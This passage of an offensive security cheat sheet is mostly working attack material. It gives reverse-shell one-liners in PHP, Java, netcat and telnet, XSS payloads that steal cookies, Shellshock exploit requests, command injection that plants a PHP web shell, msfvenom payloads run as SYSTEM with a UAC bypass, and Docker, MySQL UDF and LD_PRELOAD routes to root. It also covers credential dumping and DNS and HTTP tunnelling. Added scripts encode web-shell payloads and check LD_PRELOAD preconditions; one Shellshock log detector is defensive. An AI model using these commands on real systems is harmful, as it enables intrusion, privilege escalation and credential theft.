php -r '$sock=fsockopen("attackerip",443);exec("/bin/sh -i <&3 >&3 2>&3");'
```

Java reverse shell

```
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()
```

Netcat reverse shell

```
nc -e /bin/sh attackerip 4444
nc -e /bin/sh 192.168.37.10 443
/bin/sh | nc attackerip 443
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4443 0/tmp/
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f
```

Telnet reverse shell

```
mknod backpipe p && telnet attackerip 443 0<backpipe | /bin/bash 1>backpipe
```

Xterm reverse shell
```
apt-get install xnest
Xnest :1
xterm -display 127.0.0.1:1
xhost +targetip
xterm -display attackerip:1
/usr/openwin/bin/xterm -display attackerip:1
```

or

```
$ DISPLAY=attackerip:0 xterm
```

XSS memo

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

```
("< iframes > src=http://IP:PORT </ iframes >")
<script>document.location=http://IP:PORT</script>';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//–></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
";!–"=&{()}
<SCRIPT>alert("XSS")</SCRIPT>"">perl -e 'print "<IMG SRC=javascript:alert("XSS")>";' > out
(">< iframes http://google.com < iframes >)
"><script >alert(document.cookie)</script>
%253cscript%253ealert(document.cookie)%253c/script%253e
">alert(document.cookie)</script>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E
```

SSH over SCTP (using socat)

Suppose the SCTP socket is to listen on port 80/SCTP and sshd on port 22/TCP.
```
$ socat SCTP-LISTEN:80,fork TCP:localhost:22
```

Replace SERVER_IP with the address of the remote server, and replace 80 with the port number on which SCTP listens.

```
$ socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80
$ ssh -lusername localhost -D 8080 -p 1337
```

Using the Tor onion network

```
$ apt-get install tor torsocks
```

Tor configuration:

```
SocksPolicy accept 127.0.0.1
SocksPolicy accept 192.168.0.0/16
Log notice file /var/log/tor/notices.log
RunAsDaemon 1
HiddenServiceDir /var/lib/tor/ssh_hidden_service/
HiddenServicePort 80 127.0.0.1:22
PublishServerDescriptor 0
```

```
$ /etc/init.d/tor start
$ cat /var/lib/tor/ssh_hidden_service/hostname
3l5zstvt1zk5jhl662.onion
```

Client side (replace <user> with the account on the hidden host):

```
$ apt-get install torsocks
$ torsocks ssh <user>@3l5zstvt1zk5jhl662.onion -p 80
```

Metagoofil - metadata collection tool
Note: Metagoofil is a tool that uses Google to collect information. It automatically searches for and analyses documents indexed by the search engine, and also extracts other details such as MAC addresses and user name lists.

```
$ python metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o examplefiles -f results.html
```

Exploiting Shellshock
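Every probe in this section relies on the same trigger: a request header whose value starts with the bash function prefix `() {`. As an added example (not from the original page), here is a small Python detector that flags that prefix in the Referer and User-Agent fields of Apache combined-format access log lines and tallies hits per source; the log lines are constructed.

```python
import re
from typing import NamedTuple

# A Shellshock probe puts a bash function definition, which must begin with
# "() {", into a header that the CGI layer exports as an environment variable.
# Whitespace inside the body varies, so only the mandatory prefix is matched.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache combined log format: src ident user [ts] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed log lines. The first two mirror the nc one-liners in this section
# (payload in User-Agent); the third is benign; the fourth carries it in Referer.
SAMPLE_LOG = [
    '192.168.56.103 - - [01/Jan/2024:00:00:01 +0000] "HEAD /cgi-bin/status HTTP/1.1" 200 - "-" "() { :;}; echo $(</etc/passwd)"',
    '192.168.56.103 - - [01/Jan/2024:00:00:02 +0000] "HEAD /cgi-bin/status HTTP/1.1" 200 - "-" "() { :;}; /usr/bin/nc 192.168.56.103 443 -e /bin/sh"',
    '10.0.0.5 - - [01/Jan/2024:00:00:03 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [01/Jan/2024:00:00:04 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "() {:;}; /bin/id" "curl/7.68.0"',
]


class Hit(NamedTuple):
    src: str
    path: str
    header: str    # "ref" or "ua": which logged header carried the payload
    payload: str


def request_path(req):
    """'HEAD /cgi-bin/status HTTP/1.1' -> '/cgi-bin/status' (tolerates odd request lines)."""
    parts = req.split(" ")
    return parts[1] if len(parts) >= 2 else req


def scan_log(lines):
    """Return a Hit for every logged header that carries a Shellshock function prefix."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue           # not combined format; count these separately in production
        for header in ("ref", "ua"):
            value = m.group(header)
            if SHELLSHOCK_RE.search(value):
                hits.append(Hit(m.group("src"), request_path(m.group("req")), header, value))
    return hits


def sources_by_count(hits):
    """Aggregate hits per source address, most active first."""
    counts = {}
    for hit in hits:
        counts[hit.src] = counts.get(hit.src, 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit.src} {hit.path} via {hit.header}: {hit.payload}")
    print(sources_by_count(scan_log(SAMPLE_LOG)))
```

Only headers that Apache logs by default are inspected here; a probe in Cookie or a custom header needs full request logging or a WAF rule with the same pattern.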
```
$ ./shocker.py -H 192.168.56.118 --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo $(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80
$ nc -l -p 443
$ echo "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.56.103 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80
```

Get root via Docker
Get Docker's Root
Members of the docker group can start containers that bind-mount any host path, so docker group membership is equivalent to root on the host:
ek@victum:~$ id
uid=1001(ek) gid=1001(ek) groups=1001(ek),114(docker)
ek@victum:~$ mkdir docker-test
ek@victum:~$ cd docker-test
ek@victum:~/docker-test$ cat > Dockerfile << 'EOF'
FROM debian:wheezy
ENV WORKDIR /stuff
RUN mkdir -p $WORKDIR
VOLUME $WORKDIR
WORKDIR $WORKDIR
EOF
ek@victum:~/docker-test$ docker build -t my-docker-image .
Copy the container's /bin/sh into the bind-mounted host directory and make it setuid root (the container runs as root, and ownership set on the volume is ownership on the host):
ek@victum:~/docker-test$ docker run -v $PWD:/stuff -t my-docker-image /bin/sh -c 'cp /bin/sh /stuff && chown root.root /stuff/sh && chmod a+s /stuff/sh'
ek@victum:~/docker-test$ ./sh
# whoami
root
Or skip the setuid binary and read host files directly through a mount, e.g. /etc/shadow:
ek@victum:~$ docker run -v /etc:/stuff -t my-docker-image /bin/sh -c 'cat /stuff/shadow'

Using DNS Tunnels to Bypass Firewalls
dnscat2 tunnels a command channel over DNS queries; its server can upload and download files, run commands and forward ports on the target host.
Server (attacker):
$ apt-get update
$ apt-get -y install ruby-dev git make g++
$ gem install bundler
$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server
$ bundle install
$ ruby ./dnscat2.rb
dnscat2> New session established: 16059
dnscat2> session -i 16059
Client (target), built from dnscat2/client and pointed at the server:
$ dnscat --host <server_ip>

Compiling Assembly Code
32-bit:
$ nasm -f elf32 simple32.asm -o simple32.o
$ ld -m elf_i386 simple32.o -o simple32
64-bit:
$ nasm -f elf64 simple.asm -o simple.o
$ ld simple.o -o simple

Use a non-interactive shell (web shell) to get into the intranet
On the target, through the web shell, generate a key pair and print the public key:
$ wget -O - -q "http://domain.tk/sh.php?cmd=whoami"
$ wget -O - -q "http://domain.tk/sh.php?cmd=ssh-keygen -f /tmp/id_rsa -N ''"
$ wget -O - -q "http://domain.tk/sh.php?cmd=cat /tmp/id_rsa.pub"
On the attacker host, create a throw-away user that accepts the target's public key:
$ useradd -m tempuser
$ mkdir /home/tempuser/.ssh && chmod 700 /home/tempuser/.ssh
$ wget -O - -q "http://domain.tk/sh.php?cmd=cat /tmp/id_rsa.pub" > /home/tempuser/.ssh/authorized_keys
$ chmod 600 /home/tempuser/.ssh/authorized_keys
$ chown -R tempuser:tempuser /home/tempuser/.ssh
From the target, open a reverse tunnel: port 8080 on the attacker's loopback now reaches 192.168.20.13:8080 inside the intranet:
$ wget -O - -q "http://domain.tk/sh.php?cmd=ssh -i /tmp/id_rsa -o StrictHostKeyChecking=no -R 127.0.0.1:8080:192.168.20.13:8080 -N -f tempuser@<attacker_ip>"

Get a shell via remote command execution in a POST parameter
The IP parameter of command.php is passed to a shell unsanitized, so an injected %3B (;) terminates the intended command and runs ours:
attacker:~$ curl -i -s -k -X 'POST' --data-binary $'IP=%3Bwhoami&submit=submit' 'http://victum.tk/command.php'
Drop a minimal PHP web shell next to it, then use it directly:
attacker:~$ curl -i -s -k -X 'POST' --data-binary $'IP=%3Becho+%27%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%27+%3E+..%2Fshell.php&submit=submit' 'http://victum.tk/command.php'
attacker:~$ curl http://victum.tk/shell.php?cmd=id
attacker:~$ nc -nvlp 1337
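The two sections above hand commands to a web shell unencoded (the sh.php?cmd= requests, which break on &, # or quotes) or hand-encoded (the IP=%3B... POST bodies). An added helper, not part of the original cheat sheet, that does the percent-encoding in plain POSIX sh and builds both request forms for ASCII payloads; the hosts and paths are the ones used above, and cmdinj_post_body assumes the same IP=...&submit=submit parameter layout as command.php.

```shell
#!/bin/sh
# Added example: percent-encoding for web-shell and command-injection payloads.

# urlencode STRING [form]
# RFC 3986 percent-encoding of every byte except the unreserved characters.
# With the optional second argument "form", spaces become "+" as in
# application/x-www-form-urlencoded bodies (curl --data-binary encodes nothing).
# Assumes ASCII input: printf "'c" yields the byte value of a single-byte char.
urlencode() {
  s=$1
  mode=${2:-query}
  out=
  while [ -n "$s" ]; do
    rest=${s#?}          # string minus its first character
    c=${s%"$rest"}       # that first character
    case "$c" in
      [A-Za-z0-9._~-]) out="$out$c" ;;
      ' ') if [ "$mode" = form ]; then out="$out+"; else out="$out%20"; fi ;;
      *) out="$out$(printf '%%%02X' "'$c")" ;;
    esac
    s=$rest
  done
  printf '%s' "$out"
}

# webshell_url BASE_URL COMMAND -> GET URL for a sh.php?cmd=... style web shell
webshell_url() {
  printf '%s?cmd=%s' "$1" "$(urlencode "$2")"
}

# cmdinj_post_body COMMAND -> body for command.php; the leading ';' ends the
# command the IP parameter is fed into so that COMMAND runs after it.
cmdinj_post_body() {
  printf 'IP=%s&submit=submit' "$(urlencode ";$1" form)"
}

# Usage (hosts from the cheat sheet):
#   wget -O - -q "$(webshell_url http://domain.tk/sh.php 'cat /tmp/id_rsa.pub')"
#   curl -i -s -k -X POST --data-binary "$(cmdinj_post_body whoami)" http://victum.tk/command.php
```

cmdinj_post_body reproduces the hand-encoded bodies above byte for byte, so the same function can be used for the shell.php drop without retyping the %xx sequences.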
Reverse shell with SYSTEM privileges on Win7 as Administrator
Build the payload on the attacker host (LPORT defaults to 4444, matching the listeners below):
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.102 -f exe > danger.exe
On the target, confirm the current account is a local administrator:
net user
PsExec (https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) will launch the payload as SYSTEM; fetch it and the payload with PowerShell:
echo $client = New-Object System.Net.WebClient > script.ps1
echo $targetlocation = "http://192.168.56.102/PsExec.exe" >> script.ps1
echo $client.DownloadFile($targetlocation,"psexec.exe") >> script.ps1
powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1
echo $client = New-Object System.Net.WebClient > script2.ps1
echo $targetlocation = "http://192.168.56.102/danger.exe" >> script2.ps1
echo $client.DownloadFile($targetlocation,"danger.exe") >> script2.ps1
powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script2.ps1
If UAC blocks the elevation, bypass it with UACME (https://github.com/hfiref0x/UACME): upload https://github.com/hfiref0x/UACME/blob/master/Compiled/Akagi64.exe to the target the same way:
echo $client = New-Object System.Net.WebClient > script3.ps1
echo $targetlocation = "http://192.168.56.102/Akagi64.exe" >> script3.ps1
echo $client.DownloadFile($targetlocation,"Akagi64.exe") >> script3.ps1
powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script3.ps1
Start the listener on the attacker host, then run the payload elevated through UACME method 1:
nc -lvp 4444
Akagi64.exe 1 C:\Users\User\Desktop\danger.exe
Alternatively, with the listener running, launch the payload as SYSTEM with PsExec:
nc -lvp 4444
psexec.exe -i -d -accepteula -s danger.exe

Reverse shell with SYSTEM privileges on Win7 as an ordinary user
MS15-051 (CVE-2015-1701), a win32k.sys local privilege escalation:
https://technet.microsoft.com/en-us/security/bulletin/dn602597.aspx #ms15-051
https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html
https://www.exploit-db.com/exploits/37049/
Check whether the fix (KB3057191) is installed on the target; no output means it is missing:
wmic qfe get hotfixid | find "3057191"
Precompiled exploit:
https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe
By default it executes cmd.exe with SYSTEM privileges; to run the uploaded danger.exe instead, change the command in "main.c" of the source and rebuild:
https://github.com/hfiref0x/CVE-2015-1701
Once SYSTEM is obtained, dump credentials, e.g. cleartext passwords with Windows Credentials Editor or hashes with pwdump:
http://www.ampliasecurity.com/research/windows-credentials-editor/
wce -w
http://www.heise.de/download/pwdump.html
MS08-067 - Without Metasploit
$ nmap -v -p 139,445 --script=smb-check-vulns --script-args=unsafe=1 192.168.31.205
$ searchsploit ms08-067
$ python /usr/share/exploitdb/platforms/windows/remote/7132.py 192.168.31.205 1
(The last argument selects the target OS/language variant. On current nmap the smb-check-vulns script has been split up; use --script=smb-vuln-ms08-067 instead.)

Privilege escalation via the MySQL root account
Compile Raptor's UDF and load it as a MySQL function that runs shell commands. The command runs as the mysqld process user, so this only yields root when mysqld runs as root; secure_file_priv must also allow writing into plugin_dir.
$ wget 0xdeadbeef.info/exploits/raptor_udf2.c
$ gcc -g -c raptor_udf2.c
$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
$ mysql -u root -p
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/home/user/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select * from mysql.func;
mysql> select do_system('echo "root:passwd" | chpasswd > /tmp/out; chown user:user /tmp/out');
The root password is now "passwd":
user:~$ su -
Password:
root:~# whoami
root
root:~# id
uid=0(root) gid=0(root) groups=0(root)
Use LD_PRELOAD to inject a shared object into a program
Works when sudo preserves LD_PRELOAD (the default env_reset strips it; an env_keep entry for LD_PRELOAD in sudoers lets it through) for a command the user is allowed to run as root:
$ wget https://github.com/jivoi/pentest/ldpreload_shell.c
$ gcc -shared -fPIC ldpreload_shell.c -o ldpreload_shell.so
$ sudo -u user LD_PRELOAD=/tmp/ldpreload_shell.so /usr/local/bin/somesoft
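An added check, not from the original cheat sheet, for the two conditions the LD_PRELOAD trick depends on: it reads `sudo -l` output, confirms that env_keep preserves LD_PRELOAD and prints the first command runnable as root together with the sudo invocation to use. The sample `sudo -l` output is constructed to mirror the somesoft example above, not captured from a real host.

```shell
#!/bin/sh
# Added example: decide from `sudo -l` output whether the LD_PRELOAD trick applies.

# ld_preload_target SUDO_L_OUTPUT
# Prints the first command runnable as root and returns 0 when sudo also
# preserves LD_PRELOAD via env_keep; otherwise returns 1 with a reason on stderr.
ld_preload_target() {
  # matches env_keep+=LD_PRELOAD as well as env_keep += "LD_PRELOAD LD_LIBRARY_PATH"
  if ! printf '%s\n' "$1" | grep -Eq 'env_keep[[:space:]]*\+?=[[:space:]]*"?[^,]*LD_PRELOAD'; then
    echo "sudo does not preserve LD_PRELOAD (no env_keep entry)" >&2
    return 1
  fi
  # "(root) NOPASSWD: /path" or "(ALL : ALL) /path" -> "/path"
  target=$(printf '%s\n' "$1" \
    | grep -E '^[[:space:]]*\((root|ALL)[^)]*\)' \
    | sed -E 's/^[[:space:]]*\([^)]*\)[[:space:]]*(NOPASSWD:[[:space:]]*)?//' \
    | head -n 1)
  if [ -z "$target" ]; then
    echo "no command runnable as root" >&2
    return 1
  fi
  printf '%s\n' "$target"
}

# ld_preload_command SUDO_L_OUTPUT SO_PATH
# Prints the sudo invocation that runs the allowed command with the injected library.
ld_preload_command() {
  t=$(ld_preload_target "$1") || return 1
  printf 'sudo LD_PRELOAD=%s %s\n' "$2" "$t"
}

# Constructed sample of `sudo -l` output (not captured from a real host):
SAMPLE_SUDO_L='Matching Defaults entries for user on victum:
    env_reset, env_keep+=LD_PRELOAD, secure_path=/usr/local/bin:/usr/bin:/bin

User user may run the following commands on victum:
    (root) NOPASSWD: /usr/local/bin/somesoft'

# ld_preload_command "$SAMPLE_SUDO_L" /tmp/ldpreload_shell.so
#   -> sudo LD_PRELOAD=/tmp/ldpreload_shell.so /usr/local/bin/somesoft
```

Feed it the real `sudo -l` output (`ld_preload_target "$(sudo -l)"`); a non-zero return tells you which of the two preconditions is missing before you bother compiling the shared object.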
OpenSSH user enumeration timing attack
Note: this is a side-channel attack. A side channel leaks information through something other than the protocol's intended output, for example how long an operation takes, power consumption, electromagnetic emissions, or the size and timing of traffic. Here the side channel is the time the server takes to reject a login: when a very long password is sent, the server only spends time hashing it for accounts that exist, so existing and non-existing usernames are rejected with measurably different delays.
Osueta is a Python 2 script that uses this timing difference to enumerate valid OpenSSH usernames and, under some conditions, can also DoS the OpenSSH server.
$ ./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes
$ ./osueta.py -H 192.168.10.22 -p 22 -d 15 -v yes --dos no -L userfile.txt

Use ReDuh to tunnel TCP over legitimate-looking HTTP requests
Note: ReDuh tunnels arbitrary TCP traffic over HTTP/HTTPS. A server-side script (reDuh.jsp, .php or .aspx) uploaded to a compromised web server relays connections to ports inside its network back to the attacker's machine, which is useful when the target's internal ports are reachable only from the web server itself because of network segmentation or port policy.
The ReDuh GUI is the well-known front end for this kind of port forwarding.
Upload reDuh.jsp to the target so that it is reachable at, e.g., http://192.168.10.50/uploads/reDuh.jsp, then start the client, which listens on local port 1010 for tunnel commands:
$ java -jar reDuhClient.jar http://192.168.10.50/uploads/reDuh.jsp
$ nc -nvv 127.0.0.1 1010
[createTunnel] 7777:172.16.0.4:3389
Local port 7777 now reaches RDP on the internal host 172.16.0.4:
$ /usr/bin/rdesktop -g 1024x768 -P -z -x l -k en-us -r sound:off localhost:7777